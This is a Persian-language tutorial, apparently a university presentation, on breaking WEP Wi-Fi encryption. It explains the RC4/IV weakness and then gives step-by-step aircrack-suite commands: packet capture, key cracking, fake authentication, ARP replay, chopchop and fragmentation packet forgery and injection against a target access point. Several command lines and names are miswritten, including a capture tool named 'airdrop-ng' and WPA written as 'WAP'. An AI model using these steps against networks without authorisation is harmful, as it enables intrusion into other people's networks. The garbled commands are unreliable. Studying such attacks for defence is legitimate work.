به نام یگانه دوست
مقدمه :
امروزه شاهد گسترش چشمگیر استفاده از ارتباطات بی سیم در حوزه فناوری اطلاعات هستیم . یکی از مرسوم ترین روش های تبادل اطلاعات بی سیم در حوزه ی LAN دستگاه های بی سیم ( wireless) می باشند . با توجه به این که داده ها روی سیگنال هایی در محیط فیزیکی هوا پخش میشوند امکان شنود گسترده و نفوذ غیر مجاز به داخل شبکه محلی را فراهم میسازند , پس لازم است در کنار IEE802.11 ویژگی های دیگری نیز به لایه دسترسی داده اضافه شود تا از دسترسی غیر مجازه به شیکه جلو گیری شود .
با توجه به اضافه شدن سیستم های WEP , WAP هر کدام داری نقطه ضعف هایی بوده و امکان نفوذ غیر مجار به داخل شبکه همچنان وجود دارد . در این ارائه به نحوه نفوذ به سیستم امنیتی WEP خواهیم پرداخت .
چکیده :
WEP یا به عبارت بهتر Wired Equivalent Privacy از الگوریتم RC4 به منظور رمز نگاری کلیه پیام ها بین AP و دستگاه متصل استفاده میکند , RC4 کلید و یک IV دریافت کرده و برای تولید PRGA از آن بهره میبرد .
PRGA در آخر با متن پیام XOR شده و پیام رمز نگاری میشود . حمله هایی که به WEP صورت گرفته به دلیل تعداد 24 بیت IV بوده و میتوان با شنود شبکه تعدادی پیام با IV یکسان و در نتیجه PRGA یکسان به دست آورد که با توجه به آن رمز قابل شکستن میشود .
مراحل کار :
تنها چیزی که ما احتیاج داریم جمع آوری تعداد زیادی بسته از ترافیک با اجرای airdrop-ng برای گزارش گیری از تمام پیام های داخل شبکه وایرلس است .
Airdrop-ng channel[channel] -bssid[bssid] –write[filename][interface]
می توانیم همزمان با جمع آوری بسته ها با اجرای aircrack-ng تلاش برای شکستن کلید رمز کنیم .
Aircrack-ng [filename]
سوال ؟
اگر Access Point مشغول نباشد ; به عبارت دیگر هیچ دستگاهی در حال تبادل پیام با آن نباشد چگونه می توانیم تعدادی بسته به منظور شکستن کلید رمز جمع آوری کنیم ؟
پاسخ :
در ابتدا باید Fake authentication انجام دهیم و سپس AP را وادار به تولید تعدادی بسته بکنیم .
Aireplay-ng –fakeauth 0 – [target MAC] -h [your MAC] [interface]
حمله ی اول : ARP Replay Attack
یکی از راه های وادار کردن Access Point برای تولید بسته جدید برای به دست آوردن IV های بیشتر
ARP Request Reply Attack نام دارد . در این حمله منتظر میمانیم تا Access Point یک بسته ARP تولید کند , سپس همان بسته را به داخل شبکه برای به دست آوردن بسته های بیشتر با IV جدید تزریق میکنیم .
Aireplay-ng –arpreplay -b[terget MAC] -h [your MAC] [interface]
حمله ی دوم : Chop Chop Attack
اگر حمله ARP Request Replay Attack موفقیت آمیز نبود یعنی AP بسته ی ARP تولید نکرد می توانیم از حمله ی
chop chop attack استفاده کنیم ; دراین حمله سعی اصلی برای به دست آوردن key stream نه کلید اصلی به منظور تولید بسته های جدید است.
مثلا در مثال پایین ما تلاش می کنیم یک بسته ی ARP از شبکه بگیریم و key stream آن را پیدا کنیم , سپس آن را به شبکه تزریق کنیم .
مرحله اول : شنود یک بسته و تلاش برای تعیین Key Stream
Aireplay-ng –chopchop -b [target MAC] -h [your MAC] [interface]
مرحله دوم : تلاش برای ایجاد بسته ی جدید
Packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step ] -w [output]
مرحله سوم:تزریق بسته تولید شده به شبکه
Aireplay-ng -2 -r [out from last step] [interface]
حمله ی سوم : Pakcet Injection Fragmentation Attack
هدف اصلی این حمله به دست آوردن 1500 بایت ( PRGA(Pseudo Random Generation Algoritm برای تولید بسته های جدید است .
مرحله اول : به دست آوردن PRGA
Aireplay-ng –fragment -b [target MAC] -h [Your MAC] [Interface]
مرحله دوم: تلاش برای تولید بسته جدید
Packetforge-ng -0 -a [target MAC] -h [your MAC] -k 255.255.255.255 -l 255.255.255.255 -y [out from last step ] -w [output]
مرحله سوم:تزریق بسته جدید به شبکه برای تولید IV های جدید
Aireplay-ng -2 -r [out from last step] [interface]
امیرحسین اکبرزاده (مهندس شبکه دانشگاه سراسری ارومیه)
Email Address : amirhosein.akbarzadeh@gmail.com
